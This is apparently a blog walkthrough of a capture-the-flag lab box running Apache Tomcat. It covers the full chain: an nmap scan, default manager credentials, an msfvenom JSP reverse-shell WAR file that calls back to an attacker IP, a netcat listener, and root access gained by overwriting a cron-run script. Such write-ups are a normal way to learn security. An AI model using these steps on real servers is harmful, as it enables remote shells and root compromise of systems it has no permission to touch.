Sitemap
Open in app

Sign in

Medium Logo
Write
Search

Sign in

Thompson

4 min readJun 14, 2021

Introduction

Hi Techies,

In this topic we are going to experience a new topic of boot2boot machine.

Let’s get started

Press enter or click to view image in full size

Deploy

As known the first step is to deploy the machine

Press enter or click to view image in full size
Deploy

Connect with VPN & check connectivity

Press enter or click to view image in full size
Checking connectivity

Reconnaissance

We will check for the open ports of the vulnerable machine

#nmap -sS -sV -O 10.10.142.92

Press enter or click to view image in full size
Enumeration

We got three open ports.

Since, port 8080/http is open, we will check in web server

We have opened the web server using the 8080 port, we got some information about tomcat

After going through entire tomcat we can see, there are 3 buttons.We will check it

We will click on the server status button

Press enter or click to view image in full size
web-server

Once the button is clicked, a dialog box is prompted, which is asking for the credentials.

Press enter or click to view image in full size

As we are not sure of the credentials, click on the cancel button, it directs to the page, which has the credentials of tomcat ,manager

Username :- tomcat

Password :- s3cret

Press enter or click to view image in full size
server-status

We will login to the tomcat manager application with the credentials we found

It is directing us to another page

Press enter or click to view image in full size
a

It tells us, we can deploy the machine using WAR file

Press enter or click to view image in full size

As searched over the internet, it shows a payload for WAR file

Press enter or click to view image in full size

we will create a war file

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=1234 -f war > shell.war

Press enter or click to view image in full size

Since, we created war file. We will upload it in the web server

Press enter or click to view image in full size
Press enter or click to view image in full size
  1. user.txt

After deploying the war file, we got the shell in the browser

Press enter or click to view image in full size

Open a listening port

#nc -lvnp 1234

open the /shell

Press enter or click to view image in full size

login to home dir

Inside the home directory, we got the jack user & the user flag

In jack user, we have another two files “test.txt” & “id.sh”. We will find the contents of the file.

We found “test.txt” is an root.

2. root.txt

Usually id.sh file is executed by the root users, but it is responded to test.txt file as well.

So, we will check inside the crontab.

Press enter or click to view image in full size

Since, id.sh will be executed by root user, we will overwrite id.sh by fetching root.txt from the root user

#echo “cp root/root.txt /home/jack/root.txt”> id.sh

It gives us the information of root flag

Press enter or click to view image in full size

We found the flags

Press enter or click to view image in full size

Completed the box

Press enter or click to view image in full size

I hope this blog is quite interesting of learning new topics and helps you to gain knowledge about boot2boot machine concept.

Happy learning!!!

--

--

Pavithra Santhosh
Pavithra Santhosh

Written by Pavithra Santhosh

7 followers
2 following

This is Pavithra Santhosh, who is a aspiring Cyber security professional, Currently part of Red team certification programme from Hacker U.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech